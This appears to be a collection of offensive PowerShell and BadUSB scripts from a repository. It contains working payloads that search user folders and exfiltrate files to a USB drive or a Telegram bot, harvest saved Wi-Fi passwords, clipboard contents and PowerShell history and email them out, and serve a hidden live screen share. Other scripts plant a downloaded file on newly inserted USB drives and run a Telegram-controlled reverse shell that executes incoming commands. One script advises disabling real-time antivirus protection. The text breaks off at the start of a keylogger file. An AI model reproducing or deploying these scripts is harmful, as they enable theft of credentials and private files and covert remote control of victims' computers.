| if ($drive.length -ne 0){ 22 | Write-Host "USB Drive Connected!" -ForegroundColor Green 23 | break 24 | } 25 | $i-- 26 | if ($i -eq 0 ){ 27 | Write-Host "Timeout! Exiting" -ForegroundColor Red 28 | sleep 1 29 | exit 30 | } 31 | } 32 | 33 | [Console]::SetWindowSize(80, 30) 34 | 35 | $drive = Get-WMIObject Win32_LogicalDisk | ? 
{$_.VolumeName -eq $driveName} 36 | $driveletter = $drive.DeviceID 37 | Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green 38 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 39 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 40 | $destinationPath = "$driveLetter\$env:COMPUTERNAME-Loot" 41 | 42 | if (-not (Test-Path -Path $destinationPath)) { 43 | New-Item -ItemType Directory -Path $destinationPath -Force 44 | Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green 45 | } 46 | 47 | If ($hidden -eq 'y'){ 48 | Write-Host "Hiding the Window.." -ForegroundColor Red 49 | sleep 1 50 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 51 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 52 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 53 | if($hwnd -ne [System.IntPtr]::Zero){ 54 | $Type::ShowWindowAsync($hwnd, 0) 55 | } 56 | else{ 57 | $Host.UI.RawUI.WindowTitle = 'hideme' 58 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 59 | $hwnd = $Proc.MainWindowHandle 60 | $Type::ShowWindowAsync($hwnd, 0) 61 | } 62 | } 63 | 64 | foreach ($folder in $foldersToSearch) { 65 | Write-Host "Searching in $folder" -ForegroundColor Yellow 66 | 67 | foreach ($extension in $fileExtensions) { 68 | $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File 69 | 70 | foreach ($file in $files) { 71 | $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name 72 | Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray 73 | Copy-Item -Path $file.FullName -Destination $destinationFile 
-Force 74 | } 75 | } 76 | } 77 | If ($hidden -eq 'y'){ 78 | (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0) 79 | } 80 | else{ 81 | Write-Host "File Exfiltration Complete" -ForegroundColor Green 82 | } 83 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate files to Telegram.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Exfiltrate files to Telegram. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive all matching files in bulk zips of 50mb each. (searches user folders for pictures, video, text files etc..) 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 1. Install Telegram and make an account if you haven't already. 8 | REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 9 | REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 10 | REM 4. Run the script on target system 11 | REM 5. Check telegram chat for 'waiting to connect' message. 12 | REM 6. This script has a feature to wait until you start the session from Telegram. 13 | REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer. 14 | REM 8. 
Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | REM some setup for dukie script 17 | DEFAULT_DELAY 100 18 | 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | ENTER 23 | DELAY 4000 24 | STRING $Token = "TOKEN_HERE";$URL='https://api.telegram.org/bot{0}' -f $Token;while($chatID.length -eq 0){;$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10};Function Exfiltrate {param ([string[]]$FileType,[string[]]$Path);$maxZipFileSize = 50MB;$currentZipSize = 0;$index = 1;$zipFilePath ="$env:temp/Loot$index.zip";$MessageToSend = New-Object psobject ;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force;irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json";If($Path -ne $null){$foldersToSearch = "$env:USERPROFILE\"+$Path}else{$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")};If($FileType -ne $null){$fileExtensions = "*."+$FileType}else{$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")}Add-Type -AssemblyName System.IO.Compression.FileSystem;$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create');$escmsg = "Files from : "+$env:COMPUTERNAME;foreach ($folder in $foldersToSearch){foreach ($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse;foreach ($file in $files) {$fileSize = $file.Length;if 
($currentZipSize + $fileSize -gt $maxZipFileSize){$zipArchive.Dispose();$currentZipSize = 0;curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Sleep 1;$index++;$zipFilePath ="$env:temp/Loot$index.zip";$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')}$entryName = $file.FullName.Substring($folder.Length + 1);[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName);$currentZipSize += $fileSize}}}$zipArchive.Dispose();curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Write-Output "$env:COMPUTERNAME : Exfiltration Complete."}Exfiltrate;sleep 5;exit 25 | DELAY 500 26 | ENTER 27 | -------------------------------------------------------------------------------- /USB-Poison/main.ps1: -------------------------------------------------------------------------------- 1 | <# ====================== USB POISON ========================== 2 | 3 | SYNOPSIS 4 | This script runs quietly in the background waiting for new USB storage devices. 5 | When a new device connects, this script will copy a desired file to the root of newly connected drive. 6 | 7 | USAGE 8 | 1. REPLACE the example file URL with your own. 9 | 2. Run the script 10 | 3. Your desired file will be downloaded to the 'temp' directory 11 | 4. When a new USB storage device is connected the file is copied 12 | 5. Use Task Manager to exit the script 13 | 14 | #> 15 | 16 | # Replace with your file direct download / raw link 17 | $fileURL = "$DLurl" 18 | $fileToCopy = "$File" # if zip is downloaded 19 | 20 | if ($fileURL.length -eq 0){ 21 | $fileURL = read-host "Enter direct download file URL " 22 | } 23 | 24 | if ($fileToCopy.length -eq 0){ 25 | $fileToCopy = read-host "Enter the filename (eg. 
stage.lnk) " 26 | } 27 | 28 | # Hidden Console (y/n) 29 | $hidden = 'y' 30 | 31 | If ($hidden -eq 'y'){ 32 | Write-Host "Hiding the Window.." -ForegroundColor Red 33 | sleep 1 34 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 35 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 36 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 37 | if($hwnd -ne [System.IntPtr]::Zero){ 38 | $Type::ShowWindowAsync($hwnd, 0) 39 | } 40 | else{ 41 | $Host.UI.RawUI.WindowTitle = 'hideme' 42 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 43 | $hwnd = $Proc.MainWindowHandle 44 | $Type::ShowWindowAsync($hwnd, 0) 45 | } 46 | } 47 | 48 | function DownloadAndExtract-Zip { 49 | param ([string]$fileURL,[string]$filename) 50 | 51 | $filename = Split-Path -Path $fileURL -Leaf 52 | $tempDir = [System.IO.Path]::GetTempPath() 53 | $filepath = "$tempDir\$filename" 54 | 55 | try { 56 | Invoke-WebRequest -Uri $fileURL -OutFile $filepath 57 | Write-Host "File downloaded to $filepath" 58 | } catch { 59 | Write-Error "Failed to download file from $fileURL" 60 | return 61 | } 62 | 63 | if ($filename -like "*.zip") { 64 | Write-Host "File is a ZIP archive. Extracting contents..." 65 | 66 | $extractPath = $tempDir 67 | 68 | try { 69 | Add-Type -AssemblyName System.IO.Compression.FileSystem 70 | [System.IO.Compression.ZipFile]::ExtractToDirectory($filepath, $extractPath) 71 | Write-Host "Files extracted to $extractPath" 72 | } catch { 73 | Write-Error "Failed to extract the ZIP file" 74 | } 75 | } else { 76 | Write-Host "Downloaded file is not a ZIP archive. No extraction needed." 77 | } 78 | } 79 | 80 | DownloadAndExtract-Zip -fileURL $fileURL 81 | 82 | while($true){ 83 | $tempDir = [System.IO.Path]::GetTempPath() 84 | $fileToCopy = "$tempDir\$fileToCopy" 85 | $initialDrives = Get-WMIObject Win32_LogicalDisk | ? 
{$_.DriveType -eq 2} | select DeviceID 86 | while ($true){ 87 | $currentDrives = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | select DeviceID 88 | $newDrive = $currentDrives | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} 89 | if ($newDrive){ 90 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.DriveType -eq 2} | Where-Object { $initialDrives.DeviceID -notcontains $_.DeviceID} 91 | $driveletter = ($drive.DeviceID + '/') 92 | Copy-Item -Path $fileToCopy -Destination $driveletter 93 | sleep 1 94 | break 95 | } 96 | sleep 1 97 | } 98 | 99 | sleep 1 100 | } 101 | -------------------------------------------------------------------------------- /OSINT/Email System & User Information.txt: -------------------------------------------------------------------------------- 1 | REM Title: Email System & User Information 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather user and system information and send to an Email. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM you will need a Microsoft Outlook Email address for this to work 8 | 9 | REM *SETUP* 10 | REM replace EMAIL_HERE and PASSWORD_HERE below. 11 | 12 | REM some setup for dukie script. 13 | DEFAULT_DELAY 100 14 | 15 | REM open powershell (remove -W Hidden to show the window). 16 | GUI r 17 | DELAY 750 18 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 19 | CTRL-SHIFT ENTER 20 | DELAY 1500 21 | ALT y 22 | DELAY 5000 23 | 24 | REM replace EMAIL_HERE and PASSWORD_HERE below. 
25 | STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" 26 | 27 | REM main powershell code 28 | ENTER 29 | DELAY 100 30 | STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) 31 | STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem 32 | STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount 33 | STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" 34 | STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version 35 | STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} 36 | 37 | STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" 38 | STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 39 | STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" 40 | STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} 41 | STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 42 | 43 | STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 44 | STRING ;" CLIPBOARD INFO`n" | 
Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 45 | STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 46 | STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 47 | STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 48 | STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 49 | 50 | STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" 51 | STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) 52 | STRING ;$time = Get-Date;$ct = $time.addminutes($lost) 53 | 54 | STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl 55 | STRING ;sleep 1;exit 56 | ENTER 57 | -------------------------------------------------------------------------------- /OSINT/Desktop Screenshare over LAN.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Screenshare over HTTP. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive a screenshot of the desktop. 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 4. Run the script on target system 8 | REM 2. Wait for a message box with the ip address. 9 | REM 3. 
Type IP in browser on another device on the same network 10 | REM 4. (this Script will prompt for admin to enable opening port 8080 on the machine) 11 | 12 | REM some setup for dukie script 13 | DEFAULT_DELAY 100 14 | 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 18 | ENTER 19 | DELAY 4000 20 | STRING $HideWindow = "true";$Host.UI.RawUI.BackgroundColor = "Black";Clear-Host;$width = 88;$height = 30;[Console]::SetWindowSize($width, $height);$windowTitle = "HTTP Screenshare";[Console]::Title = $windowTitle;Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName PresentationCore,PresentationFramework;Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.Application]::EnableVisualStyles();if($HideWindow -eq "true"){If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -W Hidden -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}else{If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}Write-Host "Detecting primary network interface." 
-ForegroundColor DarkGray;$networkInterfaces = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'Virtual' };$filteredInterfaces = $networkInterfaces | Where-Object { $_.Name -match 'Wi*' -or $_.Name -match 'Eth*'};$primaryInterface = $filteredInterfaces | Select-Object -First 1;if($primaryInterface){if($primaryInterface.Name -match 'Wi*'){Write-Output "Wi-Fi is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Wi*" | Select-Object -ExpandProperty IPAddress}elseif($primaryInterface.Name -match 'Eth*'){Write-Output "Ethernet is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Eth*" | Select-Object -ExpandProperty IPAddress}else{Write-Output "Unknown primary internet connection."}}else{Write-Output "No primary internet connection found."}$refreshIntervalInSeconds = 0.5;New-NetFirewallRule -DisplayName "AllowWebServer" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow | Out-Null;$webServer = New-Object System.Net.HttpListener ;$webServer.Prefixes.Add("http://"+$loip+":8080/");$webServer.Prefixes.Add("http://localhost:8080/");$webServer.Start();Write-Host ("Network Devices Can Reach the server at : http://"+$loip+":5000");Start-Process msg.exe -ArgumentList ("* `" SERVER IP : http://$loip`:8080`"");while($true){$screen = [System.Windows.Forms.Screen]::PrimaryScreen;$bitmap = New-Object System.Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height;$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($screen.Bounds.X, $screen.Bounds.Y, 0, 0, $screen.Bounds.Size);$stream = New-Object System.IO.MemoryStream ;$bitmap.Save($stream, [System.Drawing.Imaging.ImageFormat]::Png);$stream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null;$webServerContext = $webServer.GetContext() ;$request = $webServerContext.Request;$response = $webServerContext.Response;if($request.RawUrl -eq 
"/stream"){$response.ContentType = "image/png";$stream.CopyTo($response.OutputStream)}else{$response.ContentType = "text/html";$refreshScript = "Streaming VideoStreaming Video";$buffer = [System.Text.Encoding]::UTF8.GetBytes($refreshScript);$response.OutputStream.Write($buffer, 0, $buffer.Length)}$response.Close();$stream.Dispose()}$webServer.Stop();exit 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /Reverse Shells and C2/Telegram Reverse Shell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Simple Telegram Reverse Shell 2 | REM Author: @beigeworm 3 | REM Description: A script that connects target computer with a telegram chat to send powershell commands. 4 | REM The script will wait in a loop until you interact with it later on via telegram. 5 | REM Target: Windows 10,11 6 | 7 | REM SETUP INSTRUCTIONS 8 | REM 1. visit https://t.me/botfather and make a bot. 9 | REM 2. add bot api to script. 10 | REM 3. search for bot in top left box in telegram and start a chat then type /start. 11 | REM 4. add chat ID in 'CHAT_ID_HERE' for the chat bot (run this code below to find the chat id) 12 | REM --------------------------------------------------- 13 | REM 5. Run Script on target System 14 | REM 6. Check telegram chat for 'waiting to connect' message. 15 | REM 7. this script has a feature to wait until you start the session from telegram. 16 | REM 8. type in the computer name from that message into telegram bot chat to connect to that computer. 17 | 18 | REM THIS SCRIPT IS A PROOF OF CONCEPT FOR EDUCATIONAL PURPOSES ONLY. 
19 | 20 | REM Setup for duckyscript 21 | DEFAULT_DELAY 100 22 | 23 | REM open powershell (remove -W Hidden to show the window) 24 | GUI r 25 | DELAY 750 26 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 27 | CTRL-SHIFT ENTER 28 | DELAY 1500 29 | ALT y 30 | DELAY 4000 31 | 32 | STRING $Token = 'YOUR_TOKEN_HERE';$PassPhrase = "$env:COMPUTERNAME";$URL='https://api.telegram.org/bot{0}' -f $Token ;while($chatID.length -eq 0){$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10}$AccSesH="";$LastUmsg="";$LastmsgID="";sleep 1;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Waiting to Connect..";Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";Sleep 5;Function IsAuth{param($CheckMessage)if (($messages.message.date -ne $LastUmsg) -and ($CheckMessage.message.text -like $PassPhrase) -and ($CheckMessage.message.from.is_bot -like $false)){$script:AccSesH="Authenticated";$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME Session Started.";Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body ($Mtsend | ConvertTo-Json) -ContentType "application/json";return $messages.message.chat.id}Else{return 0}};Function StrmFX{param($Stream)$FixRslt=@();$Stream | Out-File -FilePath (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") -Force;$ReadAsArray= Get-Content -Path (Join-Path $env:TMP -ChildPath "TGPSMessages.txt") | where {$_.length -gt 0};foreach ($line in $ReadAsArray){;$ArrObj=New-Object psobject;$ArrObj | Add-Member -MemberType NoteProperty -Name "Line" 
-Value ($line).tostring();$FixRslt +=$ArrObj}return $FixRslt};Function stgmsg{param($Messagetext,$ChatID)$FixedText=StrmFX -Stream $Messagetext;$Mtsend = New-Object psobject ;$Mtsend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$Mtsend | Add-Member -MemberType NoteProperty -Name 'text' -Value $FixedText.line;$JsonData=($Mtsend | ConvertTo-Json);Invoke-RestMethod -Method Post -Uri ($URL +'/sendMessage') -Body $JsonData -ContentType "application/json"};Function rtgmsg{try{$inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates') -ErrorAction Stop;return $inMessage.result[-1]}Catch{return "Fail"}};Sleep 3;While ($true){sleep 2;$messages=rtgmsg;if($LastUmsg -like $null){$LastUmsg=$messages.message.date};if(!($AccSesH)){$CheckAuthentication=IsAuth -CheckMessage $messages}Else{if(($CheckAuthentication -ne 0) -and ($messages.message.text -notlike $PassPhrase) -and ($messages.message.date -ne $LastmsgID)){try{$Result=ie`x($messages.message.text) -ErrorAction Stop;$Result;stgmsg -Messagetext $Result -ChatID $messages.message.chat.id}catch{stgmsg -Messagetext ($_.exception.message) -ChatID $messages.message.chat.id}Finally{$LastmsgID=$messages.message.date}}}};sleep 5;exit 33 | 34 | ENTER 35 | -------------------------------------------------------------------------------- /OSINT/Email System Info with Screenshot.txt: -------------------------------------------------------------------------------- 1 | REM Title: Email System & User Information 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather user and system information and send to an Email. 4 | REM Target: Windows 10 5 | 6 | REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* 7 | REM TURN OFF RT-PROTECTION BEFORE RUNNING 8 | 9 | REM *REQUIREMENTS* 10 | REM you will need a Microsoft Outlook Email address for this to work 11 | 12 | REM *SETUP* 13 | REM replace EMAIL_HERE and PASSWORD_HERE below. 
14 | 15 | REM some setup for dukie script. 16 | DEFAULT_DELAY 100 17 | 18 | REM open powershell (remove -W Hidden to show the window). 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | CTRL-SHIFT ENTER 23 | DELAY 1500 24 | ALT y 25 | DELAY 5000 26 | 27 | REM replace EMAIL_HERE and PASSWORD_HERE below. 28 | STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE" 29 | 30 | REM main powershell code 31 | STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) 32 | STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem 33 | STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount 34 | STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" 35 | STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version 36 | STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} 37 | 38 | STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" 39 | STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 40 | STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" 41 | STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} 42 
| STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 43 | 44 | STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 45 | STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 46 | STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 47 | STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 48 | STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 49 | STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 50 | 51 | STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing 52 | STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top 53 | STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) 54 | STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) 55 | 56 | STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... 
: $time" 57 | STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) 58 | STRING ;$time = Get-Date;$ct = $time.addminutes($lost) 59 | STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl 60 | STRING ;sleep 10;exit 61 | ENTER 62 | -------------------------------------------------------------------------------- /Discord-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | # ===================================================================================================================================================== 3 | <# 4 | ExtraInfo: Get a list of further info and command examples 5 | 6 | Cleanup: Wipe history (run prompt, powershell, recycle bin, Temp) 7 | 8 | Kill: Stop a running module (eg. Keycapture / Exfiltrate) 9 | 10 | ControlAll: Control all waiting sessions simultaneously 11 | 12 | ShowAll: Control all waiting sessions simultaneously 13 | 14 | Pause: Pause the current authenticated session 15 | 16 | Close: Close this session 17 | 18 | #> 19 | # ===================================================================================================================================================== 20 | # shortened URL Detection 21 | if ($dc.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." 
